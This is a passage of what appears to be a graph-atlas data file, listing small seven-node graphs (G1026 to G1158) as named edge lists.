[2, 6],
[7, 2],
[4, 7],
[6, 4],
[3, 6],
[7, 3],
[2, 1],
[3, 2]]],
['edgelist',
'G1026',
7,
[[1, 2],
[1, 3],
[1, 4],
[1, 5],
[1, 6],
[1, 7],
[2, 3],
[2, 4],
[2, 5],
[2, 6],
[3, 4],
[3, 5],
[3, 7]]],
['edgelist',
'G1027',
7,
[[4, 5],
[1, 4],
[5, 1],
[2, 5],
[4, 2],
[3, 4],
[5, 3],
[2, 1],
[3, 2],
[7, 1],
[4, 7],
[6, 4],
[5, 6]]],
['edgelist',
'G1028',
7,
[[4, 5],
[1, 4],
[5, 1],
[2, 5],
[4, 2],
[3, 4],
[5, 3],
[2, 1],
[3, 2],
[7, 1],
[4, 7],
[6, 4],
[1, 6]]],
['edgelist',
'G1029',
7,
[[4, 5],
[1, 4],
[5, 1],
[2, 5],
[4, 2],
[3, 4],
[5, 3],
[2, 1],
[3, 2],
[7, 5],
[1, 7],
[6, 1],
[4, 6]]],
['edgelist',
'G1030',
7,
[[1, 6],
[1, 7],
[2, 4],
[2, 5],
[3, 5],
[3, 6],
[3, 7],
[4, 5],
[4, 6],
[4, 7],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G1031',
7,
[[1, 2],
[1, 3],
[1, 4],
[1, 5],
[1, 6],
[1, 7],
[2, 3],
[2, 4],
[2, 5],
[3, 4],
[3, 5],
[4, 6],
[5, 7]]],
['edgelist',
'G1032',
7,
[[1, 2],
[1, 3],
[1, 4],
[1, 5],
[2, 3],
[2, 4],
[2, 5],
[3, 4],
[3, 5],
[4, 5],
[6, 2],
[7, 6],
[2, 7]]],
['edgelist',
'G1033',
7,
[[1, 5],
[1, 7],
[2, 4],
[2, 6],
[3, 4],
[3, 5],
[3, 6],
[3, 7],
[4, 6],
[4, 7],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G1034',
7,
[[1, 6],
[1, 7],
[2, 5],
[2, 7],
[3, 4],
[3, 5],
[3, 6],
[3, 7],
[4, 5],
[4, 6],
[4, 7],
[5, 6],
[6, 7]]],
['edgelist',
'G1035',
7,
[[1, 6],
[1, 7],
[2, 4],
[2, 5],
[3, 4],
[3, 5],
[3, 6],
[3, 7],
[4, 6],
[4, 7],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G1036',
7,
[[1, 2],
[1, 3],
[1, 4],
[1, 5],
[2, 3],
[2, 4],
[2, 5],
[3, 4],
[3, 5],
[4, 5],
[6, 4],
[7, 6],
[5, 7]]],
['edgelist',
'G1037',
7,
[[1, 6],
[1, 7],
[2, 6],
[2, 7],
[3, 4],
[3, 5],
[3, 6],
[3, 7],
[4, 5],
[4, 6],
[4, 7],
[5, 6],
[5, 7]]],
['edgelist',
'G1038',
7,
[[2, 4],
[3, 2],
[1, 3],
[6, 1],
[5, 6],
[4, 5],
[6, 4],
[3, 6],
[2, 1],
[5, 2],
[7, 2],
[7, 6],
[6, 2]]],
['edgelist',
'G1039',
7,
[[1, 2],
[2, 3],
[3, 4],
[1, 4],
[5, 1],
[5, 2],
[5, 3],
[5, 4],
[6, 5],
[1, 6],
[7, 1],
[4, 7],
[7, 5]]],
['edgelist',
'G1040',
7,
[[2, 4],
[3, 2],
[1, 3],
[6, 1],
[5, 6],
[4, 5],
[6, 4],
[3, 6],
[2, 1],
[5, 2],
[7, 2],
[6, 2],
[3, 7]]],
['edgelist',
'G1041',
7,
[[1, 2],
[1, 3],
[1, 4],
[1, 5],
[1, 6],
[1, 7],
[2, 3],
[2, 4],
[2, 5],
[2, 6],
[3, 4],
[3, 5],
[6, 7]]],
['edgelist',
'G1042',
7,
[[2, 1],
[3, 2],
[5, 3],
[2, 5],
[4, 2],
[1, 4],
[3, 4],
[6, 3],
[2, 6],
[1, 6],
[7, 1],
[2, 7],
[3, 7]]],
['edgelist',
'G1043',
7,
[[3, 6],
[7, 3],
[6, 7],
[5, 6],
[4, 5],
[1, 4],
[5, 1],
[2, 5],
[4, 2],
[7, 4],
[3, 2],
[5, 3],
[4, 3]]],
['edgelist',
'G1044',
7,
[[1, 4],
[1, 7],
[2, 5],
[2, 6],
[2, 7],
[3, 5],
[3, 6],
[3, 7],
[4, 5],
[4, 6],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G1045',
7,
[[3, 5],
[4, 3],
[2, 4],
[5, 2],
[1, 5],
[4, 1],
[7, 4],
[2, 7],
[6, 2],
[5, 6],
[7, 5],
[4, 6],
[2, 3]]],
['edgelist',
'G1046',
7,
[[1, 2],
[1, 3],
[1, 4],
[1, 5],
[1, 6],
[1, 7],
[2, 3],
[2, 4],
[2, 5],
[3, 5],
[3, 6],
[4, 6],
[4, 7]]],
['edgelist',
'G1047',
7,
[[1, 2],
[1, 3],
[1, 4],
[1, 5],
[1, 6],
[1, 7],
[2, 3],
[2, 4],
[2, 5],
[3, 4],
[3, 5],
[4, 6],
[6, 7]]],
['edgelist',
'G1048',
7,
[[1, 2],
[1, 3],
[1, 4],
[1, 5],
[1, 6],
[1, 7],
[2, 3],
[2, 4],
[2, 5],
[3, 4],
[3, 6],
[4, 7],
[5, 6]]],
['edgelist',
'G1049',
7,
[[1, 2],
[1, 3],
[1, 4],
[1, 5],
[1, 6],
[1, 7],
[2, 3],
[2, 4],
[2, 7],
[3, 5],
[3, 6],
[4, 5],
[4, 6]]],
['edgelist',
'G1050',
7,
[[1, 3],
[1, 7],
[2, 5],
[2, 6],
[2, 7],
[3, 4],
[3, 6],
[4, 5],
[4, 6],
[4, 7],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G1051',
7,
[[3, 6],
[2, 3],
[6, 2],
[5, 6],
[4, 5],
[1, 4],
[5, 1],
[4, 3],
[5, 3],
[2, 4],
[7, 4],
[3, 7],
[2, 7]]],
['edgelist',
'G1052',
7,
[[1, 5],
[1, 7],
[2, 5],
[2, 6],
[2, 7],
[3, 4],
[3, 6],
[3, 7],
[4, 5],
[4, 6],
[4, 7],
[5, 6],
[6, 7]]],
['edgelist',
'G1053',
7,
[[2, 4],
[3, 2],
[1, 3],
[6, 1],
[5, 6],
[4, 5],
[6, 4],
[3, 6],
[2, 1],
[5, 2],
[1, 5],
[7, 2],
[5, 7]]],
['edgelist',
'G1054',
7,
[[3, 4],
[1, 3],
[4, 1],
[5, 4],
[2, 5],
[6, 2],
[5, 6],
[2, 1],
[6, 3],
[6, 1],
[7, 6],
[2, 7],
[5, 1]]],
['edgelist',
'G1055',
7,
[[1, 2],
[2, 3],
[1, 3],
[4, 1],
[2, 4],
[4, 3],
[5, 1],
[3, 6],
[4, 5],
[6, 4],
[1, 6],
[7, 5],
[7, 2]]],
['edgelist',
'G1056',
7,
[[3, 4],
[1, 3],
[4, 1],
[5, 4],
[2, 5],
[6, 2],
[5, 6],
[2, 1],
[6, 3],
[7, 3],
[6, 7],
[1, 6],
[2, 3]]],
['edgelist',
'G1057',
7,
[[6, 5],
[7, 3],
[7, 5],
[5, 4],
[6, 1],
[4, 2],
[4, 3],
[7, 4],
[6, 7],
[5, 1],
[2, 5],
[6, 2],
[1, 4]]],
['edgelist',
'G1058',
7,
[[1, 3],
[1, 7],
[2, 4],
[2, 5],
[2, 6],
[3, 6],
[3, 7],
[4, 5],
[4, 6],
[4, 7],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G1059',
7,
[[2, 6],
[5, 2],
[1, 5],
[6, 1],
[3, 6],
[5, 3],
[4, 5],
[6, 4],
[1, 2],
[3, 1],
[4, 3],
[7, 6],
[7, 5]]],
['edgelist',
'G1060',
7,
[[2, 4],
[3, 2],
[1, 3],
[6, 1],
[5, 6],
[4, 5],
[6, 4],
[3, 6],
[2, 1],
[5, 2],
[1, 5],
[1, 7],
[5, 7]]],
['edgelist',
'G1061',
7,
[[1, 5],
[4, 1],
[3, 4],
[5, 3],
[2, 5],
[4, 2],
[2, 1],
[6, 1],
[5, 6],
[2, 6],
[7, 2],
[1, 7],
[4, 7]]],
['edgelist',
'G1062',
7,
[[1, 6],
[1, 7],
[2, 3],
[2, 6],
[2, 7],
[3, 4],
[3, 5],
[4, 5],
[4, 6],
[4, 7],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G1063',
7,
[[2, 4],
[3, 2],
[1, 3],
[6, 1],
[5, 6],
[4, 5],
[5, 2],
[6, 4],
[3, 6],
[2, 1],
[7, 4],
[5, 7],
[6, 2]]],
['edgelist',
'G1064',
7,
[[6, 3],
[1, 3],
[4, 1],
[5, 4],
[2, 5],
[6, 2],
[5, 6],
[2, 1],
[7, 3],
[7, 4],
[2, 3],
[4, 2],
[5, 1]]],
['edgelist',
'G1065',
7,
[[2, 1],
[3, 2],
[1, 3],
[1, 4],
[4, 3],
[7, 3],
[2, 7],
[6, 2],
[7, 6],
[5, 7],
[6, 5],
[1, 6],
[5, 1]]],
['edgelist',
'G1066',
7,
[[1, 6],
[1, 7],
[2, 5],
[2, 6],
[2, 7],
[3, 4],
[3, 5],
[3, 6],
[3, 7],
[4, 5],
[4, 6],
[4, 7],
[5, 7]]],
['edgelist',
'G1067',
7,
[[1, 6],
[1, 7],
[2, 4],
[2, 5],
[2, 7],
[3, 4],
[3, 5],
[3, 6],
[3, 7],
[4, 6],
[4, 7],
[5, 6],
[5, 7]]],
['edgelist',
'G1068',
7,
[[1, 2],
[2, 3],
[5, 2],
[4, 2],
[1, 5],
[3, 4],
[1, 4],
[3, 1],
[6, 1],
[7, 6],
[5, 7],
[4, 6],
[5, 3]]],
['edgelist',
'G1069',
7,
[[1, 6],
[1, 7],
[2, 3],
[2, 4],
[2, 5],
[3, 5],
[3, 6],
[3, 7],
[4, 5],
[4, 6],
[4, 7],
[5, 7],
[6, 7]]],
['edgelist',
'G1070',
7,
[[4, 5],
[2, 4],
[3, 2],
[1, 3],
[6, 1],
[5, 6],
[3, 5],
[6, 2],
[1, 4],
[1, 5],
[3, 4],
[7, 6],
[1, 7]]],
['edgelist',
'G1071',
7,
[[6, 3],
[1, 3],
[4, 1],
[5, 4],
[2, 5],
[6, 2],
[5, 6],
[2, 1],
[7, 3],
[7, 4],
[3, 4],
[6, 1],
[5, 1]]],
['edgelist',
'G1072',
7,
[[1, 2],
[2, 3],
[3, 4],
[6, 5],
[1, 5],
[6, 1],
[6, 2],
[6, 3],
[6, 4],
[7, 4],
[7, 5],
[5, 3],
[1, 4]]],
['edgelist',
'G1073',
7,
[[1, 2],
[1, 7],
[2, 5],
[2, 6],
[3, 4],
[3, 5],
[3, 6],
[3, 7],
[4, 5],
[4, 6],
[4, 7],
[5, 7],
[6, 7]]],
['edgelist',
'G1074',
7,
[[1, 2],
[1, 7],
[2, 6],
[2, 7],
[3, 4],
[3, 5],
[3, 6],
[3, 7],
[4, 5],
[4, 6],
[4, 7],
[5, 6],
[5, 7]]],
['edgelist',
'G1075',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[7, 3],
[1, 7],
[6, 1],
[3, 6],
[6, 4],
[5, 6],
[7, 5],
[4, 7]]],
['edgelist',
'G1076',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[7, 6],
[1, 7],
[1, 3],
[3, 6],
[6, 4],
[5, 6],
[7, 5],
[4, 7]]],
['edgelist',
'G1077',
7,
[[4, 5],
[1, 4],
[5, 1],
[4, 7],
[4, 2],
[3, 4],
[5, 3],
[2, 1],
[3, 2],
[6, 3],
[4, 6],
[7, 3],
[6, 7]]],
['edgelist',
'G1078',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[6, 1],
[6, 2],
[6, 3],
[6, 4],
[6, 5],
[7, 6],
[4, 7],
[5, 7]]],
['edgelist',
'G1079',
7,
[[2, 1],
[3, 2],
[7, 1],
[2, 5],
[4, 2],
[1, 4],
[3, 4],
[2, 7],
[2, 6],
[3, 7],
[5, 4],
[6, 5],
[7, 6]]],
['edgelist',
'G1080',
7,
[[1, 2],
[1, 3],
[1, 4],
[1, 5],
[1, 6],
[1, 7],
[2, 3],
[2, 4],
[2, 5],
[3, 6],
[3, 7],
[4, 6],
[5, 7]]],
['edgelist',
'G1081',
7,
[[1, 7],
[2, 3],
[3, 4],
[1, 4],
[5, 3],
[6, 1],
[7, 4],
[5, 2],
[4, 5],
[7, 6],
[2, 6],
[4, 6],
[2, 4]]],
['edgelist',
'G1082',
7,
[[1, 2],
[2, 3],
[3, 4],
[1, 4],
[5, 1],
[5, 2],
[7, 5],
[5, 4],
[6, 5],
[6, 3],
[7, 1],
[4, 7],
[4, 6]]],
['edgelist',
'G1083',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 7],
[1, 5],
[7, 6],
[1, 7],
[7, 5],
[3, 6],
[6, 4],
[5, 6],
[2, 6],
[7, 2]]],
['edgelist',
'G1084',
7,
[[1, 5],
[1, 6],
[1, 7],
[2, 5],
[2, 6],
[2, 7],
[3, 4],
[3, 6],
[3, 7],
[4, 5],
[4, 7],
[5, 6],
[6, 7]]],
['edgelist',
'G1085',
7,
[[1, 5],
[1, 6],
[1, 7],
[2, 4],
[2, 6],
[2, 7],
[3, 4],
[3, 6],
[3, 7],
[4, 5],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G1086',
7,
[[3, 4],
[6, 3],
[7, 6],
[4, 7],
[5, 4],
[6, 5],
[1, 6],
[3, 1],
[2, 3],
[1, 2],
[6, 2],
[5, 3],
[7, 5]]],
['edgelist',
'G1087',
7,
[[3, 2],
[1, 6],
[7, 1],
[5, 7],
[6, 5],
[2, 6],
[7, 2],
[4, 7],
[6, 4],
[3, 6],
[7, 3],
[2, 1],
[4, 5]]],
['edgelist',
'G1088',
7,
[[1, 2],
[3, 1],
[3, 4],
[4, 5],
[1, 5],
[1, 6],
[7, 2],
[5, 7],
[7, 6],
[3, 7],
[4, 2],
[6, 4],
[7, 1]]],
['edgelist',
'G1089',
7,
[[1, 5],
[1, 6],
[1, 7],
[2, 3],
[2, 6],
[2, 7],
[3, 4],
[3, 7],
[4, 5],
[4, 6],
[4, 7],
[5, 6],
[5, 7]]],
['edgelist',
'G1090',
7,
[[3, 4],
[1, 3],
[4, 1],
[5, 4],
[5, 7],
[6, 2],
[5, 6],
[4, 2],
[6, 3],
[7, 1],
[7, 2],
[3, 2],
[5, 2]]],
['edgelist',
'G1091',
7,
[[1, 2],
[2, 3],
[3, 4],
[1, 4],
[5, 1],
[5, 2],
[5, 4],
[6, 5],
[6, 3],
[6, 2],
[7, 6],
[2, 7],
[3, 7]]],
['edgelist',
'G1092',
7,
[[1, 5],
[1, 6],
[1, 7],
[2, 5],
[2, 6],
[2, 7],
[3, 4],
[3, 6],
[3, 7],
[4, 5],
[4, 6],
[4, 7],
[5, 7]]],
['edgelist',
'G1093',
7,
[[4, 1],
[3, 4],
[5, 3],
[1, 5],
[6, 2],
[6, 3],
[7, 2],
[7, 1],
[4, 7],
[2, 4],
[7, 5],
[6, 5],
[6, 4]]],
['edgelist',
'G1094',
7,
[[1, 5],
[1, 6],
[1, 7],
[2, 3],
[2, 5],
[2, 6],
[3, 4],
[3, 7],
[4, 5],
[4, 6],
[4, 7],
[5, 7],
[6, 7]]],
['edgelist',
'G1095',
7,
[[1, 5],
[1, 6],
[1, 7],
[2, 4],
[2, 6],
[2, 7],
[3, 4],
[3, 5],
[3, 6],
[4, 5],
[4, 7],
[5, 7],
[6, 7]]],
['edgelist',
'G1096',
7,
[[1, 3],
[1, 6],
[1, 7],
[2, 3],
[2, 5],
[2, 7],
[3, 4],
[4, 5],
[4, 6],
[4, 7],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G1097',
7,
[[4, 5],
[6, 1],
[4, 6],
[1, 7],
[7, 5],
[3, 4],
[5, 3],
[2, 1],
[3, 2],
[2, 7],
[6, 2],
[3, 6],
[7, 3]]],
['edgelist',
'G1098',
7,
[[1, 3],
[1, 6],
[1, 7],
[2, 3],
[2, 4],
[2, 5],
[3, 7],
[4, 5],
[4, 6],
[4, 7],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G1099',
7,
[[4, 1],
[3, 4],
[5, 3],
[1, 5],
[6, 4],
[6, 3],
[6, 5],
[2, 4],
[2, 1],
[5, 2],
[7, 1],
[4, 7],
[2, 7]]],
['edgelist',
'G1100',
7,
[[3, 4],
[1, 3],
[4, 1],
[5, 4],
[2, 5],
[6, 2],
[5, 6],
[7, 1],
[2, 7],
[7, 4],
[5, 7],
[2, 3],
[6, 1]]],
['edgelist',
'G1101',
7,
[[1, 5],
[1, 6],
[1, 7],
[2, 3],
[2, 4],
[2, 7],
[3, 4],
[3, 6],
[3, 7],
[4, 5],
[4, 6],
[5, 6],
[5, 7]]],
['edgelist',
'G1102',
7,
[[1, 5],
[1, 6],
[1, 7],
[2, 3],
[2, 4],
[2, 7],
[3, 5],
[3, 6],
[3, 7],
[4, 5],
[4, 6],
[4, 7],
[5, 6]]],
['edgelist',
'G1103',
7,
[[1, 2],
[2, 3],
[3, 4],
[1, 4],
[5, 1],
[5, 2],
[6, 4],
[6, 5],
[7, 5],
[7, 3],
[7, 6],
[6, 3],
[4, 7]]],
['edgelist',
'G1104',
7,
[[1, 2],
[1, 6],
[1, 7],
[2, 4],
[2, 5],
[3, 4],
[3, 5],
[3, 6],
[3, 7],
[4, 5],
[4, 7],
[5, 6],
[6, 7]]],
['edgelist',
'G1105',
7,
[[1, 2],
[1, 6],
[1, 7],
[2, 4],
[2, 5],
[3, 4],
[3, 5],
[3, 6],
[3, 7],
[4, 6],
[4, 7],
[5, 6],
[5, 7]]],
['edgelist',
'G1106',
7,
[[1, 2],
[3, 1],
[3, 4],
[4, 5],
[1, 5],
[1, 6],
[7, 2],
[5, 7],
[7, 6],
[3, 7],
[4, 2],
[6, 4],
[3, 2]]],
['edgelist',
'G1107',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[5, 6],
[1, 6],
[3, 5],
[6, 3],
[2, 6],
[2, 5],
[2, 4],
[3, 1],
[5, 1],
[6, 4]]],
['edgelist',
'G1108',
7,
[[4, 5],
[2, 4],
[3, 2],
[1, 3],
[6, 1],
[5, 6],
[3, 5],
[6, 2],
[1, 4],
[2, 5],
[1, 2],
[3, 4],
[1, 5],
[2, 7]]],
['edgelist',
'G1109',
7,
[[1, 7],
[2, 4],
[2, 5],
[2, 6],
[3, 4],
[3, 5],
[3, 6],
[3, 7],
[4, 5],
[4, 6],
[4, 7],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G1110',
7,
[[1, 2],
[1, 3],
[1, 4],
[1, 5],
[1, 6],
[1, 7],
[3, 5],
[3, 6],
[3, 7],
[4, 5],
[4, 6],
[4, 7],
[5, 7],
[6, 7]]],
['edgelist',
'G1111',
7,
[[1, 7],
[2, 4],
[2, 5],
[2, 6],
[2, 7],
[3, 4],
[3, 5],
[3, 6],
[3, 7],
[4, 5],
[4, 6],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G1112',
7,
[[1, 4],
[2, 3],
[2, 5],
[2, 6],
[2, 7],
[3, 5],
[3, 6],
[3, 7],
[4, 5],
[4, 6],
[4, 7],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G1113',
7,
[[1, 2],
[1, 3],
[1, 4],
[1, 5],
[2, 3],
[2, 4],
[2, 5],
[3, 4],
[3, 5],
[4, 5],
[4, 7],
[6, 4],
[5, 6],
[7, 5]]],
['edgelist',
'G1114',
7,
[[1, 2],
[1, 3],
[1, 4],
[1, 5],
[2, 3],
[2, 4],
[2, 5],
[3, 4],
[3, 5],
[4, 5],
[7, 3],
[2, 7],
[6, 2],
[1, 6]]],
['edgelist',
'G1115',
7,
[[1, 2],
[1, 3],
[1, 4],
[1, 5],
[2, 3],
[2, 4],
[2, 5],
[3, 4],
[3, 5],
[4, 5],
[6, 3],
[4, 6],
[7, 5],
[1, 7]]],
['edgelist',
'G1116',
7,
[[4, 5],
[2, 4],
[3, 2],
[1, 3],
[6, 1],
[5, 6],
[3, 5],
[6, 2],
[1, 4],
[2, 5],
[1, 2],
[1, 5],
[7, 5],
[1, 7]]],
['edgelist',
'G1117',
7,
[[1, 2],
[1, 3],
[1, 4],
[1, 5],
[1, 6],
[1, 7],
[2, 3],
[2, 4],
[2, 5],
[2, 6],
[2, 7],
[4, 5],
[4, 6],
[5, 7]]],
['edgelist',
'G1118',
7,
[[1, 2],
[1, 3],
[1, 4],
[1, 5],
[1, 6],
[1, 7],
[2, 7],
[3, 6],
[3, 7],
[4, 5],
[4, 6],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G1119',
7,
[[1, 2],
[1, 3],
[1, 4],
[1, 5],
[1, 6],
[1, 7],
[2, 5],
[3, 6],
[3, 7],
[4, 6],
[4, 7],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G1120',
7,
[[4, 5],
[2, 4],
[3, 2],
[1, 3],
[6, 1],
[5, 6],
[1, 2],
[6, 2],
[1, 5],
[2, 5],
[6, 4],
[3, 6],
[7, 5],
[1, 7]]],
['edgelist',
'G1121',
7,
[[2, 4],
[3, 2],
[1, 3],
[6, 1],
[5, 6],
[4, 5],
[6, 4],
[3, 6],
[2, 1],
[5, 2],
[7, 2],
[6, 2],
[3, 7],
[1, 5]]],
['edgelist',
'G1122',
7,
[[1, 2],
[1, 3],
[1, 4],
[1, 5],
[1, 6],
[1, 7],
[2, 7],
[3, 6],
[3, 7],
[4, 5],
[4, 6],
[4, 7],
[5, 6],
[5, 7]]],
['edgelist',
'G1123',
7,
[[3, 4],
[5, 3],
[7, 4],
[5, 1],
[7, 1],
[4, 5],
[4, 2],
[6, 5],
[6, 1],
[1, 4],
[2, 6],
[6, 4],
[7, 5],
[7, 2]]],
['edgelist',
'G1124',
7,
[[1, 2],
[1, 3],
[1, 4],
[1, 5],
[2, 3],
[2, 4],
[2, 5],
[3, 4],
[3, 5],
[4, 5],
[6, 4],
[7, 6],
[5, 7],
[6, 5]]],
['edgelist',
'G1125',
7,
[[4, 2],
[2, 5],
[3, 4],
[4, 5],
[1, 5],
[2, 6],
[1, 2],
[1, 3],
[3, 6],
[6, 4],
[5, 6],
[2, 3],
[7, 3],
[6, 7]]],
['edgelist',
'G1126',
7,
[[1, 4],
[1, 7],
[2, 5],
[2, 6],
[2, 7],
[3, 4],
[3, 5],
[3, 6],
[3, 7],
[4, 5],
[4, 6],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G1127',
7,
[[1, 4],
[1, 7],
[2, 3],
[2, 5],
[2, 6],
[3, 5],
[3, 6],
[3, 7],
[4, 5],
[4, 6],
[4, 7],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G1128',
7,
[[1, 6],
[1, 7],
[2, 5],
[2, 6],
[2, 7],
[3, 4],
[3, 5],
[3, 6],
[3, 7],
[4, 5],
[4, 6],
[4, 7],
[5, 6],
[5, 7]]],
['edgelist',
'G1129',
7,
[[1, 2],
[1, 7],
[2, 5],
[2, 6],
[3, 4],
[3, 5],
[3, 6],
[3, 7],
[4, 5],
[4, 6],
[4, 7],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G1130',
7,
[[1, 6],
[1, 7],
[2, 3],
[2, 4],
[2, 5],
[3, 5],
[3, 6],
[3, 7],
[4, 5],
[4, 6],
[4, 7],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G1131',
7,
[[1, 2],
[1, 3],
[1, 4],
[1, 5],
[2, 3],
[2, 4],
[2, 5],
[3, 4],
[3, 5],
[5, 7],
[6, 3],
[2, 6],
[1, 6],
[7, 4]]],
['edgelist',
'G1132',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[6, 1],
[6, 2],
[6, 3],
[6, 4],
[6, 5],
[5, 3],
[4, 1],
[7, 2],
[6, 7]]],
['edgelist',
'G1133',
7,
[[1, 5],
[1, 7],
[2, 3],
[2, 4],
[2, 6],
[2, 7],
[3, 4],
[3, 6],
[3, 7],
[4, 5],
[4, 6],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G1134',
7,
[[1, 5],
[1, 7],
[2, 4],
[2, 5],
[2, 6],
[2, 7],
[3, 4],
[3, 5],
[3, 6],
[3, 7],
[4, 6],
[4, 7],
[5, 6],
[6, 7]]],
['edgelist',
'G1135',
7,
[[1, 6],
[1, 7],
[2, 4],
[2, 5],
[2, 6],
[2, 7],
[3, 4],
[3, 5],
[3, 6],
[3, 7],
[4, 5],
[4, 7],
[5, 6],
[6, 7]]],
['edgelist',
'G1136',
7,
[[3, 4],
[1, 3],
[4, 1],
[5, 4],
[2, 5],
[6, 2],
[2, 3],
[6, 3],
[5, 1],
[4, 2],
[6, 1],
[7, 6],
[7, 5],
[1, 2]]],
['edgelist',
'G1137',
7,
[[3, 4],
[1, 3],
[4, 1],
[5, 4],
[2, 5],
[6, 2],
[5, 6],
[6, 3],
[7, 1],
[7, 2],
[6, 1],
[2, 3],
[4, 2],
[5, 1]]],
['edgelist',
'G1138',
7,
[[6, 7],
[1, 6],
[7, 1],
[5, 7],
[6, 5],
[2, 6],
[7, 2],
[4, 7],
[6, 4],
[3, 6],
[7, 3],
[2, 1],
[3, 2],
[4, 5]]],
['edgelist',
'G1139',
7,
[[1, 2],
[1, 3],
[1, 4],
[1, 5],
[1, 6],
[1, 7],
[2, 6],
[2, 7],
[3, 6],
[3, 7],
[4, 5],
[4, 7],
[5, 6],
[6, 7]]],
['edgelist',
'G1140',
7,
[[1, 2],
[3, 1],
[3, 4],
[4, 5],
[1, 5],
[1, 6],
[7, 2],
[5, 7],
[7, 6],
[3, 7],
[4, 2],
[6, 4],
[7, 1],
[4, 7]]],
['edgelist',
'G1141',
7,
[[4, 2],
[5, 3],
[5, 6],
[5, 1],
[2, 5],
[1, 4],
[6, 1],
[6, 3],
[7, 2],
[4, 7],
[7, 1],
[6, 7],
[7, 3],
[5, 7]]],
['edgelist',
'G1142',
7,
[[1, 5],
[4, 1],
[3, 4],
[5, 3],
[2, 5],
[4, 2],
[2, 1],
[3, 2],
[6, 5],
[2, 6],
[7, 2],
[4, 7],
[1, 6],
[7, 1]]],
['edgelist',
'G1143',
7,
[[4, 5],
[5, 3],
[2, 6],
[5, 1],
[2, 5],
[6, 4],
[4, 1],
[6, 3],
[7, 5],
[1, 7],
[4, 7],
[3, 7],
[6, 7],
[2, 7]]],
['edgelist',
'G1144',
7,
[[1, 2],
[1, 3],
[1, 4],
[1, 5],
[1, 6],
[1, 7],
[2, 5],
[2, 6],
[3, 4],
[3, 7],
[4, 7],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G1145',
7,
[[3, 4],
[5, 3],
[7, 4],
[5, 1],
[5, 6],
[4, 5],
[4, 2],
[6, 3],
[2, 7],
[6, 7],
[7, 1],
[6, 4],
[7, 5],
[1, 2]]],
['edgelist',
'G1146',
7,
[[1, 5],
[1, 6],
[1, 7],
[2, 4],
[2, 6],
[2, 7],
[3, 4],
[3, 5],
[3, 7],
[4, 5],
[4, 6],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G1147',
7,
[[1, 5],
[1, 6],
[1, 7],
[2, 3],
[2, 6],
[2, 7],
[3, 4],
[3, 5],
[4, 5],
[4, 6],
[4, 7],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G1148',
7,
[[3, 4],
[5, 3],
[7, 4],
[5, 1],
[2, 5],
[7, 1],
[4, 2],
[6, 3],
[5, 6],
[6, 7],
[2, 6],
[6, 4],
[7, 5],
[4, 1]]],
['edgelist',
'G1149',
7,
[[4, 2],
[5, 3],
[1, 4],
[5, 1],
[2, 5],
[6, 4],
[6, 1],
[6, 3],
[7, 5],
[2, 7],
[7, 4],
[1, 7],
[7, 6],
[3, 7]]],
['edgelist',
'G1150',
7,
[[1, 2],
[5, 3],
[4, 1],
[5, 1],
[5, 6],
[6, 4],
[2, 4],
[6, 3],
[7, 5],
[3, 7],
[7, 6],
[4, 7],
[7, 2],
[1, 7]]],
['edgelist',
'G1151',
7,
[[1, 2],
[1, 3],
[1, 4],
[1, 5],
[1, 6],
[1, 7],
[2, 3],
[2, 7],
[3, 6],
[4, 5],
[4, 6],
[4, 7],
[5, 6],
[5, 7]]],
['edgelist',
'G1152',
7,
[[1, 2],
[1, 3],
[1, 4],
[1, 5],
[1, 6],
[1, 7],
[2, 6],
[2, 7],
[3, 4],
[3, 5],
[4, 6],
[4, 7],
[5, 6],
[5, 7]]],
['edgelist',
'G1153',
7,
[[3, 4],
[5, 3],
[7, 4],
[5, 1],
[2, 5],
[7, 2],
[4, 2],
[6, 3],
[6, 1],
[6, 7],
[5, 6],
[6, 4],
[7, 1],
[4, 1]]],
['edgelist',
'G1154',
7,
[[3, 4],
[5, 3],
[4, 1],
[5, 1],
[5, 6],
[4, 5],
[4, 2],
[6, 3],
[1, 2],
[6, 7],
[7, 1],
[6, 4],
[7, 5],
[2, 7]]],
['edgelist',
'G1155',
7,
[[1, 5],
[1, 6],
[1, 7],
[2, 4],
[2, 6],
[2, 7],
[3, 4],
[3, 5],
[3, 6],
[3, 7],
[4, 5],
[4, 7],
[5, 6],
[6, 7]]],
['edgelist',
'G1156',
7,
[[1, 4],
[1, 5],
[1, 7],
[2, 3],
[2, 5],
[2, 6],
[3, 4],
[3, 6],
[3, 7],
[4, 6],
[4, 7],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G1157',
7,
[[1, 5],
[1, 6],
[1, 7],
[2, 3],
[2, 4],
[2, 7],
[3, 5],
[3, 6],
[3, 7],
[4, 5],
[4, 6],
[4, 7],
[5, 6],
[6, 7]]],
['edgelist',
'G1158',
7,
[[1, 2],
[1, 6],
[1, 7],
[2, 5],
[2, 7],
[3, 4],
